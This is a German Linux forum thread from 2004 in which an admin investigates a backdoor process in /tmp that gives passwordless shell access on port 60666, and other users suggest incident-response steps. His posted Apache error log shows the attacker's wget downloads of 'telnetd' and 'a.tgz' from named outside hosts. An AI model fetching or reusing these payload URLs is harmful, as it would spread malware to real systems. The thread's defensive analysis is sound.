Prozess ./a hört auf Port 60666 mit telnet shellzugang

Dieses Thema: "Prozess ./a hört auf Port 60666 mit telnet shellzugang" im Forum "Security Talk" wurde erstellt von lukewill, 03.10.2004.

  1. #1 lukewill, 03.10.2004
    lukewill

    lukewill Mitglied

    Dabei seit:
    03.06.2004
    Beiträge:
    26
    Zustimmungen:
    0
    Hallo,

    ich habe natürlich noch nicht alle entsprechenden Tutorials gelesen, von daher möge man mir etwas Unwissenheit verzeihen. Nun zu meinem Problem:

    Ich habe auf meinem Server festgestellt das dort ein Prozess "./a" läuft. Dieser Prozess ist von wwwrun gestartet. Die Datei habe ich auch gefunden liegt im /tmp. Dieses Demon hört auf Port 60666, wenn ich nun auf dem Server ein telnet localhost 60666 machen, bekomme ich einen Shellzugang -ohne Passworteingabe natürlich- als wwwrun und kann freudig in Dateisystem umherschlendern.

    Den Prozess habe ich natürlich beendet und die Datei kann ich natürlich auch löschen, mich würde aber viel mehr interessieren wie die Datei da hin gekommen ist und wie dieser Prozess gestartet wird.

    Dann stelle ich noch fest, das in den letzten Tagen jemand versucht das rootpasswort bzw. eine passende User/passwort-kombi raus zu bekommen, im log sieht man auf jeden Fall über stunden fehl geschlagene Versuche. Dazu direkt noch ne Frage: Macht es Sinn die ip-adresse zu verfolgen und ggf. dem Provider ne Nachricht zu schicken?

    Ein paar technische infos noch.

    rootserver bei server4you
    kernel 2.4.21
    apache 2.0.48
    suse 9.0

    offene Ports http, pop3, imap, ssh, 10000, 389, 53

    Vielen Dank schon mal
    L
     
  2. Anzeige

    Schau dir mal diesen Ratgeber an. Viele Antworten inkl. passender Shell-Befehle!
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. devilz

    devilz Pro*phet
    Administrator

    Dabei seit:
    01.05.2002
    Beiträge:
    12.244
    Zustimmungen:
    0
    Ort:
    Hessen
  4. #3 qmasterrr, 03.10.2004
    qmasterrr

    qmasterrr Foren Gott

    Dabei seit:
    01.01.2004
    Beiträge:
    2.735
    Zustimmungen:
    0
    Ort:
    Germany/NRW/Wesel
    damit hast du das problem nicht gelöst der angreifer konnte einmal das programm installieren folglich kann er es auch ein 2tes mal...
    also sei auf der hut den der angreifer weiß nun das du weißt das er da ist...
     
  5. Mauser

    Mauser Master Of Disaster

    Dabei seit:
    28.10.2003
    Beiträge:
    72
    Zustimmungen:
    0
    Ort:
    Hessen
    hi,

    ich würde dir auch installation eines tools wie aide oder tripwire raten, damit du feststellen kannst ob programme auf dem server ausgetauscht wurden.
    mfg
    Mauser
     
  6. #5 damager, 03.10.2004
    damager

    damager Moderator

    Dabei seit:
    27.08.2003
    Beiträge:
    3.065
    Zustimmungen:
    0
    Ort:
    Munich
    also ich würde eine neu-installation vorschlagen...
    fest steht ds sich wohl jemand zugang verschaft hat ,,, und weiter ausspioniert.
    ich würde, aus neugier, mal diesen netz-verkehr tracen (ethereal, snoop, tcpdump...). einfach um zu sehen was und wohin das übertragen wird.
     
  7. #6 lukewill, 03.10.2004
    lukewill

    lukewill Mitglied

    Dabei seit:
    03.06.2004
    Beiträge:
    26
    Zustimmungen:
    0
    Also,

    ich habe mal den rkhunter laufen lassen. Es werden nur 4 Programme als Vulnerable angezeigt:
    • GnuPG 1.2.2
    • OpenSSL 0.9.7b
    • PHP 4.3.3
    • Procmail MTA 3.15.1

    ausser PHP nutze ich keinen der Verdächtigen. Dann wird noch eines als unkown angezeigt: OpenSSH 3.7.1p2

    Alle anderen Ausgaben sind im grünen Bereich.

    Ich habe das Programm im /tmp mal durch ein Schript ersetzt, sollte derjenige also noch mal vorbei kommen müsste ich das mit bekommen.

    Gegen eine neuinstallation habe ich grundsätzlich nichts, ich möchte nur vorher wissen wie das ganze abgelaufen ist. Sonst nutzt die schönste neuinstallation nix. Vielleicht habe ich die Lücke aber auch durch das letzte update geschlossen, aber um das zu entscheiden muss ich ebenfalls wissen was abgegangen ist.

    Übrigens, kann ich jemanden mit den programm "a" glücklich machen :sly: , ahhh bzw. hat da jemand interesse daran :D

    Viele Grüße und Danke
    L
     
  8. #7 lukewill, 03.10.2004
    lukewill

    lukewill Mitglied

    Dabei seit:
    03.06.2004
    Beiträge:
    26
    Zustimmungen:
    0
    error-log

    Hallo nochmal,

    hier ein paar info aus der apache errorlog:

    Code:
    [Wed Sep 22 15:33:56 2004] [error] [client 211.196.64.90] user database not found: /
    [Wed Sep 22 15:34:01 2004] [error] [client 211.196.64.90] user database not found: /
    --22:42:48--  http://membres.lycos.fr/hiddenseeker/telnetd
               => `telnetd'
    Resolving membres.lycos.fr... done.
    Connecting to membres.lycos.fr[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 170,613 [text/plain]
    
        0K .......... .......... .......... .......... .......... 30%  157.23 KB/s
       50K .......... .......... .......... .......... .......... 60%  292.40 KB/s
      100K .......... .......... .......... .......... .......... 90%  396.83 KB/s
      150K .......... ......                                     100%  519.20 KB/s
    
    22:42:49 (257.52 KB/s) - `telnetd' saved [170613/170613]
    
    script not found or unable to stat
    script not found or unable to stat
    script not found or unable to stat
    script not found or unable to stat
    script not found or unable to stat
    script not found or unable to stat
    --16:50:42--  http://mystery.hostrocket.com/a.tgz
               => `a.tgz'
    Resolving mystery.hostrocket.com... done.
    Connecting to mystery.hostrocket.com[216.120.237.78]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 8,086 [application/x-tar]
    
        0K .......                                               100%   78.18 KB/s
    
    16:50:44 (78.18 KB/s) - `a.tgz' saved [8086/8086]
    
    [Wed Sep 29 03:08:03 2004] [error] [client 218.72.115.62] user  not found: /
    [Wed Sep 29 13:17:35 2004] [notice] caught SIGTERM, shutting down
    [Wed Sep 29 13:18:49 2004] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
    [Wed Sep 29 13:18:49 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
    [Wed Sep 29 13:18:50 2004] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
    [Wed Sep 29 22:18:36 2004] [error] [client 80.230.24.63] user  not found: /
    [Wed Sep 29 22:18:37 2004] [error] [client 80.230.24.63] user admin not found: /
    
    ......
    
    [Fri Oct 01 12:47:28 2004] [error] [client 211.220.255.239] user wwwadmin not found: /
    --15:34:39--  http://mystery.hostrocket.com/a.tgz
               => `a.tgz.1'
    Auflösen des Hostnamen »mystery.hostrocket.com«.... fertig.
    Verbindungsaufbau zu mystery.hostrocket.com[216.120.237.78]:80... verbunden.
    HTTP Anforderung gesendet, warte auf Antwort... 200 OK
    Länge: 8,086 [application/x-tar]
    
        0K .......                                               100%   78.18 KB/s
    
    15:34:40 (78.18 KB/s) - »a.tgz.1« gespeichert [8086/8086]
    
    script not found or unable to stat
    script not found or unable to stat
    [Sat Oct 02 16:24:40 2004] [notice] caught SIGTERM, shutting down
    [Sat Oct 02 16:25:38 2004] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
    [Sat Oct 02 16:25:38 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
    [Sat Oct 02 16:25:38 2004] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
    script not found or unable to stat
    [Sat Oct 02 19:56:31 2004] [notice] caught SIGTERM, shutting down
    Vielleicht sagt dies ja jemanden etwas, mir noch nicht. Die Datei kann man sich immer noch an der Stelle ziehen

    Viele Grüße
    L
     
  9. #8 qmasterrr, 03.10.2004
    qmasterrr

    qmasterrr Foren Gott

    Dabei seit:
    01.01.2004
    Beiträge:
    2.735
    Zustimmungen:
    0
    Ort:
    Germany/NRW/Wesel
    mach ein whois und schreib dem besitzer des servers/domain eine mail...
    das wenn nicht bald die backdoor verschwindet du rechtliche schritte einleiten wirst *G
    das ganze könnet aber auch einfach eine leichtbearbeitete version von nc sein mehr braucht man nicht um eine remote shell zu bekommen.
    aber eins steht fest es war kein profi sonst hätte er seine prozesse besser getarnt...
     
  10. #9 damager, 03.10.2004
    damager

    damager Moderator

    Dabei seit:
    27.08.2003
    Beiträge:
    3.065
    Zustimmungen:
    0
    Ort:
    Munich
    stimmt, eine prozess nur "a" zu nennen ... ist schon sehr stümperhaft.
    trotzdem werd ich mir das teil mal selber saugen :D ... und mal genauer angucken.
     
  11. chb

    chb Steirer

    Dabei seit:
    01.06.2003
    Beiträge:
    2.359
    Zustimmungen:
    0
    Ort:
    ÖSTERREICH
  12. #11 qmasterrr, 04.10.2004
    qmasterrr

    qmasterrr Foren Gott

    Dabei seit:
    01.01.2004
    Beiträge:
    2.735
    Zustimmungen:
    0
    Ort:
    Germany/NRW/Wesel
    http://vil.nai.com/vil/content/v_99978.htm
    -Manually running the malicious file initializes the infection, if the user has emough rights to change (write to) files.

    In letztertzeit fragwürdige/rechtunbekannte software installiert?
     
  13. #12 lukewill, 04.10.2004
    lukewill

    lukewill Mitglied

    Dabei seit:
    03.06.2004
    Beiträge:
    26
    Zustimmungen:
    0
    Ich habe mich auch schon den ganzen Tag soo schlecht gefühlt.

    Nicht wirklich. Wenn ich spielen oder was ausprobieren will mache ich das zuhause.

    Hier (http://vil.nai.com/vil/content/v_99978.htm ) steht dann auch noch:


    Die anderen Auswirkungen geänderte files in /bin kann ich auch nicht entdecken. Es sieht also erst mal so aus als ob nix passiert ist. Ich habe mir dann noch überlegt:

    Das Teil hat auf port 60666 gelauscht, der Port ist aber in der Firewall gesperrt bzw. Verbindungsaufbau auf diesem Port ist nicht erlaubt. Damit kann doch über diesen Port keiner in das System eingedrungen sein. Dann hört der noch auf Port 80, den dürfte er doch als wwwrun gar nicht belegen und da liegt ja auch der Apache. Damit dürfte aus dieser Richtung auch keine Gefahr drohen. Ich habe mir dann noch die logfiles angeschaut und stelle auch da nix verdächtiges fest.

    Ich will mir das jetzt nicht schön reden, aber es sieht nach noch mal Glück gehabt aus :bounce:

    Wie seht Ihr das?

    Viele Grüße
    L
     
  14. #13 damager, 04.10.2004
    damager

    damager Moderator

    Dabei seit:
    27.08.2003
    Beiträge:
    3.065
    Zustimmungen:
    0
    Ort:
    Munich
    ich pers. hätte dabei ein schlechtes bauch-gefühl aber das muss jeder selbst wissen :-)
     
  15. #14 qmasterrr, 04.10.2004
    qmasterrr

    qmasterrr Foren Gott

    Dabei seit:
    01.01.2004
    Beiträge:
    2.735
    Zustimmungen:
    0
    Ort:
    Germany/NRW/Wesel
    scan dein system doch wie ch-b schon gesagt hat mit http://www.clamav.net/ dann weißt du wie es um dein sys steht...
     
  16. #15 lukewill, 05.10.2004
    lukewill

    lukewill Mitglied

    Dabei seit:
    03.06.2004
    Beiträge:
    26
    Zustimmungen:
    0
    Erledigt. Kein Befund.

    Ich bin allerdings immer noch neugierig wie denn die Datei da hin gekommen ist und wie derjenige es geschafft hat das Teil auszupacken und zu starten. hat jemand vielleicht noch ne idee?

    Viele Grüße
    und vielen Dank an alle die sich Gedanken über das Problem gemacht haben.

    L
     
Thema:

Prozess ./a hört auf Port 60666 mit telnet shellzugang

Die Seite wird geladen...

Prozess ./a hört auf Port 60666 mit telnet shellzugang - Ähnliche Themen

  1. GPL-Prozess gegen VMware hat begonnen

    GPL-Prozess gegen VMware hat begonnen: Der von Christoph Hellwig angestrengte Prozess gegen VMware wegen vermuteter GPL-Verletzung begann vor dem Landgericht Hamburg mit einer Anhörung....
  2. Wine überarbeitet Entwicklungsprozess

    Wine überarbeitet Entwicklungsprozess: Alexandre Julliard, langjähriger Maintainer des Wine-Projektes, hat Änderungen bei der Freigabe der künftigen Varianten des Windows-API-Nachbaus...
  3. Qualcomm publiziert Registerdokumentation für Adreno-Grafikprozessoren

    Qualcomm publiziert Registerdokumentation für Adreno-Grafikprozessoren: Als erster Hersteller von Chips für eingebettete Systeme hat Qualcomm überraschend eine Dokumentation für Teile seiner Adreno-Grafikprozessoren...
  4. Neue Intel-Grafikprozessoren nutzen proprietäre Firmware-Dateien

    Neue Intel-Grafikprozessoren nutzen proprietäre Firmware-Dateien: Ein neulich getätigter Beitrag zum Linux-Kernel zeigt, dass einige der neueren i915-Grafikprozessoren nun erstmals auf Firmware angewiesen sind,...
  5. Raspberry Pi 2 versechsfacht Prozessorleistung

    Raspberry Pi 2 versechsfacht Prozessorleistung: Die Raspberry Pi Foundation hat den Nachfolger des erfolgreichen Kleinrechners Raspberry Pi vorgestellt. Raspberry Pi 2 kommt mit einem Prozessor...